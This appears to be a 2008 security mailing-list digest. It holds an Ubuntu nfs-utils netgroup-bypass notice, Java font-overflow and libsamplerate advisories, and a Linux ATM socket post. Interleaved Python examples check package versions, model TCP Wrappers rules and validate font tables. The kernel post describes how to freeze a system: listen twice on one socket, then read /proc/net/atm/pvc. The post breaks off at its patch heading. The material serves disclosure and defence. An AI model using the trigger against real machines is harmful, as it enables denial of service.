===========================================================
Ubuntu Security Notice USN-687-1          December 04, 2008
nfs-utils vulnerability
CVE-2008-4552
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  nfs-kernel-server               1:1.0.7-3ubuntu2.1

Ubuntu 7.10:
  nfs-kernel-server               1:1.1.1~git-20070709-3ubuntu1.1

Ubuntu 8.04 LTS:
  nfs-kernel-server               1:1.1.2-2ubuntu2.2

Ubuntu 8.10:
  nfs-kernel-server               1:1.1.2-4ubuntu1.1

After a standard system upgrade you need to restart nfs services to effect
the necessary changes.
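Checking a host against the table above means comparing Debian version strings, and those do not sort lexically: the epoch before the `:` is compared first, `~` sorts before anything else including the end of the string (which is why `1:1.1.1~git-20070709-3ubuntu1.1` is older than a hypothetical `1:1.1.1-1`), and runs of digits are compared as numbers. The Python below is an added example and not part of the Ubuntu notice; it implements dpkg's comparison rules (the same ordering as `dpkg --compare-versions`) and reports whether a given installed version of nfs-kernel-server is at or past the fixed version for its release. The installed versions in the `__main__` block are constructed sample values, not readings from a real host.

```python
import re
from itertools import zip_longest

# Fixed nfs-kernel-server versions from USN-687-1, keyed by Ubuntu release.
FIXED_VERSIONS = {
    "6.06": "1:1.0.7-3ubuntu2.1",
    "7.10": "1:1.1.1~git-20070709-3ubuntu1.1",
    "8.04": "1:1.1.2-2ubuntu2.2",
    "8.10": "1:1.1.2-4ubuntu1.1",
}

def split_version(version):
    """Split '[epoch:]upstream[-revision]' into (epoch, upstream, revision).
    Only the last '-' separates the Debian revision; a missing epoch is 0."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, sep, revision = version.rpartition("-")
    if not sep:                      # no '-' at all: everything is upstream
        upstream, revision = revision, ""
    return epoch, upstream, revision

def _weight(ch):
    """dpkg's character ordering: '~' < end of string < letters < other symbols."""
    if ch == "~":
        return -1
    if ch == "":
        return 0
    if ch.isalpha():
        return ord(ch)
    return ord(ch) + 256

def _compare_fragment(a, b):
    """dpkg's verrevcmp(): alternate runs of non-digits (compared character by
    character with _weight) and runs of digits (compared numerically)."""
    while a or b:
        text_a = re.match(r"[^0-9]*", a).group(0)
        text_b = re.match(r"[^0-9]*", b).group(0)
        for ca, cb in zip_longest(text_a, text_b, fillvalue=""):
            diff = _weight(ca) - _weight(cb)
            if diff:
                return -1 if diff < 0 else 1
        a, b = a[len(text_a):], b[len(text_b):]
        num_a = re.match(r"[0-9]*", a).group(0)
        num_b = re.match(r"[0-9]*", b).group(0)
        if int(num_a or "0") != int(num_b or "0"):
            return -1 if int(num_a or "0") < int(num_b or "0") else 1
        a, b = a[len(num_a):], b[len(num_b):]
    return 0

def compare_versions(a, b):
    """Return -1, 0 or 1 with the same ordering as 'dpkg --compare-versions'."""
    epoch_a, up_a, rev_a = split_version(a)
    epoch_b, up_b, rev_b = split_version(b)
    if epoch_a != epoch_b:
        return -1 if epoch_a < epoch_b else 1
    return _compare_fragment(up_a, up_b) or _compare_fragment(rev_a, rev_b)

def is_fixed(release, installed):
    """True when the installed nfs-kernel-server is at or past the USN-687-1 fix."""
    return compare_versions(installed, FIXED_VERSIONS[release]) >= 0

if __name__ == "__main__":
    # Constructed sample of what "dpkg-query -W -f='${Version}' nfs-kernel-server"
    # might report on hosts of each release; not taken from a real system.
    sample = {"6.06": "1:1.0.7-3ubuntu2", "7.10": "1:1.1.1~git-20070709-3ubuntu1.1",
              "8.04": "1:1.1.2-2ubuntu2.1", "8.10": "1:1.1.2-4ubuntu1.1"}
    for release, installed in sample.items():
        print(release, installed, "fixed" if is_fixed(release, installed) else "VULNERABLE")
```

On a real host the installed version comes from `dpkg-query -W -f='${Version}' nfs-kernel-server`, and the same comparison applies to nfs-common, which is built from the same source package and carries the same version. Being at the fixed version is necessary but not sufficient: the notice says the nfs services must also be restarted, so a process started before the upgrade is still running the old code.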

Details follow:

It was discovered that nfs-utils did not properly enforce netgroup
restrictions when using TCP Wrappers. Remote attackers could bypass the
netgroup restrictions enabled by the administrator and possibly gain
access to sensitive information.
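It helps to see what a netgroup rule in TCP Wrappers actually tests and how it can silently stop applying. libwrap consults /etc/hosts.allow first, then /etc/hosts.deny, and allows when neither matches; a client pattern of the form `@netgroup` is resolved with innetgr() against the client's host name, never its address. MITRE's entry for CVE-2008-4552 attributes the bypass to nfs-utils calling hosts_ctl() with its arguments in the wrong order, so that the netgroup lookup was made on the wrong identity; the notice above only says the restrictions were not enforced. The Python below is an added example, not code from nfs-utils or libwrap: a small evaluator for hosts.allow/hosts.deny (ALL, exact name or address, domain suffix, address prefix, `@netgroup` and EXCEPT; no KNOWN/UNKNOWN/PARANOID and no shell-command options) over a constructed netgroup map and two constructed rule sets, next to the same check made with name and address transposed. All host names and addresses are invented.

```python
import re

# Constructed stand-in for what innetgr() would look up in NIS or /etc/netgroup.
NETGROUPS = {
    "nfsclients":  {"fs1.example.org", "fs2.example.org"},
    "quarantined": {"bad.example.org"},
}

# Two constructed configurations, each as (hosts.allow text, hosts.deny text).
DENY_LIST_CONFIG = (
    "",                                                 # hosts.allow: empty
    "mountd, lockd, statd, rquotad: @quarantined\n",    # hosts.deny: block a netgroup
)
ALLOW_LIST_CONFIG = (
    "mountd: @nfsclients\n",                            # hosts.allow: only the netgroup
    "ALL: ALL\n",                                       # hosts.deny: everyone else
)

def parse_access_file(text):
    """Parse 'daemon_list : client_list [: option]' lines into token lists.
    Comments and blank lines are skipped; any third field is ignored."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split(":")
        daemons = [t for t in re.split(r"[,\s]+", fields[0].strip()) if t]
        clients = [t for t in re.split(r"[,\s]+", fields[1].strip()) if t]
        rules.append((daemons, clients))
    return rules

def list_matches(tokens, match_one):
    """A libwrap list; 'A EXCEPT B' matches when A matches and B does not."""
    if "EXCEPT" in tokens:
        i = tokens.index("EXCEPT")
        return list_matches(tokens[:i], match_one) and not list_matches(tokens[i + 1:], match_one)
    return any(match_one(t) for t in tokens)

def client_matches(pattern, client_name, client_addr):
    """One client pattern, following libwrap's host_match() rules."""
    if pattern == "ALL":
        return True
    if pattern.startswith("@"):          # netgroup: innetgr() is asked about the host NAME
        return client_name in NETGROUPS.get(pattern[1:], set())
    if pattern.startswith("."):          # trailing domain components
        return client_name.endswith(pattern)
    if pattern.endswith("."):            # leading address components
        return client_addr.startswith(pattern)
    return pattern in (client_name, client_addr)

def hosts_ctl(config, daemon, client_name, client_addr):
    """libwrap's decision: hosts.allow first, then hosts.deny, default allow."""
    allow_text, deny_text = config

    def matches(rules):
        return any(
            list_matches(ds, lambda d: d in ("ALL", daemon))
            and list_matches(cs, lambda p: client_matches(p, client_name, client_addr))
            for ds, cs in rules
        )

    if matches(parse_access_file(allow_text)):
        return True
    if matches(parse_access_file(deny_text)):
        return False
    return True

def nfs_check_fixed(config, daemon, client_name, client_addr):
    """The check as it should be made: name and address in libwrap's order."""
    return hosts_ctl(config, daemon, client_name, client_addr)

def nfs_check_broken(config, daemon, client_name, client_addr):
    """Same call with name and address transposed, modelling the argument-order
    mistake MITRE's CVE-2008-4552 entry describes. Assumption: the actual
    nfs-utils call site is not reproduced on this page."""
    return hosts_ctl(config, daemon, client_addr, client_name)
```

With the netgroup used in hosts.deny, the transposed call lets a quarantined host through, which is the bypass the notice describes; with the netgroup used in hosts.allow it locks legitimate members out instead, because the `@netgroup` test never matches either way. The thing to verify after upgrading and restarting the services is therefore that `@netgroup` entries take effect again for every listed daemon, from both a member and a non-member host.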


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.0.7-3ubuntu2.1.diff.gz
      Size/MD5:    26729 5926412b5a7d5318b1b90747cade6294
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.0.7-3ubuntu2.1.dsc
      Size/MD5:      698 28b88a044214b04388c55c9e206b48c5
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.0.7.orig.tar.gz
      Size/MD5:   401155 73d8af4367c79f31f68a4ca45422fd17

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_amd64.deb
      Size/MD5:   105890 d8e004d18150e3d6e91575e91b9f3c0c
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_amd64.deb
      Size/MD5:   125960 7ddc8bb36714d4ee3db12ce91adbda22
    http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_amd64.deb
      Size/MD5:    45058 d7f5a96c16456e520a28e0c0cb31cb0c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_i386.deb
      Size/MD5:    94970 37cc41d6a9ad5505cb32528f14ec647f
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_i386.deb
      Size/MD5:   112816 e47956631dcb0c8980cd0f72a4e8428e
    http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_i386.deb
      Size/MD5:    43208 c0a0ff484719033e7be7ef166d54602f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_powerpc.deb
      Size/MD5:   107416 aac5f08b6f0f1fb5dea98a574d129225
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_powerpc.deb
      Size/MD5:   123988 dac1ae13e726e5e8bdca56aae8ab2a23
    http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_powerpc.deb
      Size/MD5:    44786 b65159109f7d2f0678350194be9b25c8

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_sparc.deb
      Size/MD5:    96252 8628208ebf8634aeb657c1f99c34ec83
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_sparc.deb
      Size/MD5:   114508 a96b1eab0b5a39e0062ad2c1592c2bd6
    http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_sparc.deb
      Size/MD5:    44092 fffba1487c5b3660c592bfe6e5bdc935

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.1~git-20070709-3ubuntu1.1.diff.gz
      Size/MD5:    30941 387a16c1bfc126fe5228b7cd7f895b47
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.1~git-20070709-3ubuntu1.1.dsc
      Size/MD5:     1041 ee2f5835d47387259a1ffc509a1c800e
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.1~git-20070709.orig.tar.gz
      Size/MD5:  1207377 0c1a357290f5f233543bc942c0a006ad

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_amd64.deb
      Size/MD5:   187718 a21ea0964e11dc7437b31c8a24136a4e
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_amd64.deb
      Size/MD5:   158258 5245d20a87b1f265d699082fd3465cf0

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_i386.deb
      Size/MD5:   176422 90dcb97b35a35e59de12e1432c1ab276
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_i386.deb
      Size/MD5:   148016 9f1a96121a13d0c89fed88ff4651600c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_lpia.deb
      Size/MD5:   174424 09722999f8b92441488357e7d51b78be
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_lpia.deb
      Size/MD5:   147538 3983e3fa6588d37d350cd99441b6c2eb

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_powerpc.deb
      Size/MD5:   196470 d8ac43aff7c7099db1751dbe7e7064dc
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_powerpc.deb
      Size/MD5:   164396 668269dd69cbc4c3f51510b4fa41e9ef

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_sparc.deb
      Size/MD5:   179480 3e647339bec5baa0f94fd87a5569d8fa
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_sparc.deb
      Size/MD5:   149530 072323ce17f01390d48928254953af97

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-2ubuntu2.2.diff.gz
      Size/MD5:    35143 8595826433437ca8d573aadecec55b9e
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-2ubuntu2.2.dsc
      Size/MD5:     1022 c62bbac19283a7958350d308197562fe
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2.orig.tar.gz
      Size/MD5:   797386 76ee9274c2b867839427eba91b327f03

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_amd64.deb
      Size/MD5:   203396 e8caf55e52bd09522c911658c9208e0a
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_amd64.deb
      Size/MD5:   161652 0b2da0a86933e493142827ee3491f041

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_i386.deb
      Size/MD5:   190380 3365b806f003547556784dc460854acf
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_i386.deb
      Size/MD5:   150442 ae44f68055ff09b377dda8f77e7d7369

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_lpia.deb
      Size/MD5:   190708 56cff37c459c9bacecc0e19eac96493b
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_lpia.deb
      Size/MD5:   150870 0fa925b4b0417a78b81fd437978469ab

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_powerpc.deb
      Size/MD5:   212528 a92ea0106bf861d99eb2bcbb0e41e49c
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_powerpc.deb
      Size/MD5:   167720 2efce3bec09f1c42f577071a597236cb

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_sparc.deb
      Size/MD5:   193568 c82d3d388b1839ce31464b2941f9c9a3
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_sparc.deb
      Size/MD5:   151834 6028d63bf61670986dd3ac84d82f8f7e

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-4ubuntu1.1.diff.gz
      Size/MD5:    36776 80b7806275d3318009e26cdd4f21e80e
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-4ubuntu1.1.dsc
      Size/MD5:     1426 d54ccf3d5cc03325778b2197597eb3b4
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2.orig.tar.gz
      Size/MD5:   797386 76ee9274c2b867839427eba91b327f03

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_amd64.deb
      Size/MD5:   206234 8fade4ffc3b54967b451601ebe3cd783
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_amd64.deb
      Size/MD5:   163432 52da66c1d20b506f83794d1116d7197f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_i386.deb
      Size/MD5:   191928 daf9c6e085ae1dc0677dd86c7946aac9
    http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_i386.deb
      Size/MD5:   151532 87df37c719bd84c7520b0dfa86b9587d

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_lpia.deb
      Size/MD5:   190668 8d2b6e20721ce687cb179b755e36d680
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_lpia.deb
      Size/MD5:   151770 701f49fcee4e0d9c4db0ddba416a80bf

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_powerpc.deb
      Size/MD5:   210084 3cddb9b535c4266bc418d83c3c68e817
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_powerpc.deb
      Size/MD5:   165774 e797caaae77e93b657884c8076da8742

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_sparc.deb
      Size/MD5:   195372 3026036061bc3138387bb29a81dc4836
    http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_sparc.deb
      Size/MD5:   153086 ccddafa24f7ce6182616c995b2c90603


From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org, full-disclosure@lists.grok.org.uk
Date: Thu, 04 Dec 2008 17:35:06 -0500
Subject: iDefense Security Advisory 12.04.08: Sun Java JRE TrueType Font Parsing Integer Overflow Vulnerability

iDefense Security Advisory 12.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 02, 2008

I. BACKGROUND

The Sun Java JRE is Sun's implementation of the Java runtime. For more
information, see the vendor's site found at the following link.

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Sun
Microsystems Inc.'s Java JRE could allow an attacker to execute
arbitrary code with the privileges of the current user.

The vulnerability exists within the font parsing code in the JRE. As
part of its font API, the JRE provides the ability to load a font from
a remote URL. Various types of fonts are supported, one of which is the
TrueType format font. The vulnerability occurs when parsing various
structures in TrueType font files. During parsing, values are taken
from the file, and without being properly validated, used in operations
that calculate the number of bytes to allocate for heap buffers. The
calculations can overflow, resulting in a potentially exploitable heap
overflow.
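The failure mode described above is generic to binary font parsing: a count or length read from the file is multiplied by an element size, or added to an offset, in 32-bit arithmetic; the result wraps to a small number; the allocation is sized from the wrapped value; and the copy that follows overflows it. The Python below is an added example, not the JRE's code. The advisory does not say which TrueType structures were involved, so the example validates the one structure every TrueType file has, the sfnt table directory, and emulates the 32-bit arithmetic a C parser performs to show what the unchecked calculation would have produced. The tags, offsets and lengths in the constructed inputs are made up.

```python
import struct

MAX_U32 = 0xFFFFFFFF

def mul_u32(a, b):
    """Emulate a C uint32 multiplication: (value the vulnerable code would
    hand to the allocator, whether the true product wrapped)."""
    product = a * b
    return product & MAX_U32, product > MAX_U32

def add_u32(a, b):
    """Emulate a C uint32 addition, e.g. offset + length in a bounds check."""
    total = a + b
    return total & MAX_U32, total > MAX_U32

def checked_size(count, elem_size, limit):
    """Bytes needed for count elements of elem_size bytes, or None when the
    exact product exceeds limit. Python integers do not wrap, so the
    comparison is made on the true value."""
    product = count * elem_size
    return product if product <= limit else None

class FontError(ValueError):
    """Raised for any file-derived value that fails validation."""

def parse_table_directory(data):
    """Parse the sfnt offset table and its table records, validating every
    count, offset and length before use. Returns {tag: (offset, length)}."""
    if len(data) < 12:
        raise FontError("offset table truncated")
    sfnt_version, num_tables = struct.unpack_from(">IH", data, 0)
    if sfnt_version not in (0x00010000, 0x74727565):      # 1.0 or 'true'
        raise FontError("not a TrueType sfnt")
    # The record array needs num_tables * 16 bytes; bound it by what is
    # actually present instead of trusting the count.
    dir_len = checked_size(num_tables, 16, len(data) - 12)
    if dir_len is None:
        raise FontError("directory claims %d entries, file too short" % num_tables)
    tables = {}
    for i in range(num_tables):
        tag, _checksum, offset, length = struct.unpack_from(">4sIII", data, 12 + 16 * i)
        # offset + length is evaluated exactly here; a uint32 sum can wrap to
        # a small value and pass a naive '<= file_size' test.
        if offset < 12 + dir_len or offset + length > len(data):
            raise FontError("table %s [%#x+%#x] lies outside the file"
                            % (tag.decode("latin-1"), offset, length))
        tables[tag.decode("latin-1")] = (offset, length)
    return tables

def is_well_formed(data):
    """Boolean wrapper so callers need not catch FontError."""
    try:
        parse_table_directory(data)
        return True
    except FontError:
        return False

def build_font(records, payload_len):
    """Constructed test input: a version-1.0 sfnt header, the given
    (tag, offset, length) records, then payload_len bytes of filler.
    Not a usable font; only the directory is meaningful."""
    header = struct.pack(">IHHHH", 0x00010000, len(records), 0, 0, 0)
    body = b"".join(struct.pack(">4sIII", tag, 0, off, ln) for tag, off, ln in records)
    return header + body + b"\0" * payload_len

# Constructed: a header claiming 65535 records in a file that ends right
# after the offset table.
OVERSTATED_DIRECTORY = struct.pack(">IHHHH", 0x00010000, 0xFFFF, 0, 0, 0)

# Constructed: offset + length wraps to 0x10 in uint32 arithmetic, so a C
# check of the form 'offset + length <= file_size' would accept it.
WRAPPING_FONT = build_font([(b"glyf", 0xFFFFFFF0, 0x20)], 32)

# Constructed: one 16-byte table directly after the record array.
GOOD_FONT = build_font([(b"head", 28, 16)], 16)
```

The rule the checked path applies is the one every size computation from untrusted input needs: compute the product or sum in a width that cannot wrap (in C, test `count > limit / elem_size` before multiplying, or use a checked-arithmetic helper), compare the exact value against what the file actually contains, and reject before allocating. The same pattern applies to the per-table structures (glyph counts, segment counts, name records) once the directory is trusted.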

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code in the context
of the currently logged on user. To exploit this vulnerability, a
targeted user must load a malicious web page created by an attacker. An
attacker typically accomplishes this via social engineering or injecting
content into compromised, trusted sites.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Sun
Microsystems Inc.'s Java JRE version 1.6.0_05 for Windows. Previous
versions may also be affected.

V. WORKAROUND

There is a potential workaround for the vulnerability, but it renders
the JRE unusable. It is possible to use the cacls program to change the
file permissions on fontmanager.dll. This will prevent the vulnerable
library from loading. However, this workaround has a serious impact on
the functionality of the JRE. When a webpage attempts to load an
applet, the JRE will abort with a runtime error, and the browser will
close.

VI. VENDOR RESPONSE

Sun Microsystems Inc. has released a patch which addresses this issue.
For more information, consult their advisory at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-66-244987-1

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

07/31/2008  Initial Vendor Notification
08/01/2008  Initial Vendor Reply
10/21/2008  Additional Vendor Feedback
11/26/2008  Additional Vendor Feedback
12/02/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Sebastian Apelt
(webmaster@buzzworld.org).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Date: Thu, 4 Dec 2008 18:17:48 -0600
Subject: ZDI-08-077: Trillian AIM IMG Tag Parsing Stack Overflow Vulnerability

From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Date: Thu, 4 Dec 2008 18:18:08 -0600
Subject: ZDI-08-078: Trillian IMG SRC ID Memory Corruption Vulnerability

From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Date: Thu, 4 Dec 2008 18:18:26 -0600
Subject: ZDI-08-079: Trillian AIM Plugin Malformed XML Tag Heap Overflow Vulnerability

From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Date: Thu, 4 Dec 2008 18:18:45 -0600
Subject: ZDI-08-080: Sun Java AWT Library Sandbox Violation Vulnerability

From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Date: Thu, 4 Dec 2008 18:19:04 -0600
Subject: ZDI-08-081: Sun Java Web Start and Applet Multiple Sandbox Bypass Vulnerabilities

From: security@mandriva.com
To: bugtraq@securityfocus.com
Date: Thu, 04 Dec 2008 18:34:00 -0700
Subject: [ MDVSA-2008:238 ] libsamplerate

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:238
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : libsamplerate
 Date    : December 4, 2008
 Affected: 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 A buffer overflow was found by Russell O'Conner in the libsamplerate
 library versions prior to 0.1.4 that could possibly lead to the
 execution of arbitrary code via a specially crafted audio file
 (CVE-2008-5008).
 
 The updated packages have been patched to prevent this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5008
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 9a9cc1fbac25741ad38e914c98d90826  2008.0/i586/libsamplerate0-0.1.3-0.pre6.3.1mdv2008.0.i586.rpm
 294117b4e81f6d38553faf47b0d0b561  2008.0/i586/libsamplerate-devel-0.1.3-0.pre6.3.1mdv2008.0.i586.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

Message-ID: <49388C8A.4070208@synchlabs.com>
Date: Fri, 05 Dec 2008 02:06:02 +0000
From: Hugo Dias <hdias@synchlabs.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vuln@secunia.com, ssynchron@gmail.com
Subject: CVE-2008-5079: multiple listen()s on same socket corrupts the vcc table

CVE-2008-5079: multiple listen()s on same socket corrupts the vcc table

Release Date: 2008/12/05

I. Impact

Local Denial of Service on Linux kernel 2.6.x


II. Description

A vulnerability exists in the Linux kernel which can be exploited
by malicious users to cause a Denial of Service.

It seems that calling the svc_listen function in 'net/atm/svc.c'
twice on the same socket will create unassigned PVC/SVC entries,
despite returning EUNATCH.

These entries are visible using the proc filesystem.

#cat /proc/net/atm/vc

Address  Itf ...
c7f34400 Unassigned   ...
c7f34400 Unassigned   ...
c7f34400 Unassigned   ...
.......

The code in 'net/atm/proc.c', responsible for displaying this info,
can't handle the unassigned entries. The kernel will freeze in an
infinite loop in 'proc.c' if we cat '/proc/net/atm/pvc':


net/atm/proc.c:

static inline int compare_family(struct sock *sk, int family)
{
        return !family || (sk->sk_family == family);
}

try_again:
        for (; sk; sk = sk_next(sk)) {
                l -= compare_family(sk, family); <<<<<<<<<
                if (l < 0)
                        goto out;
        }


IV. Patch

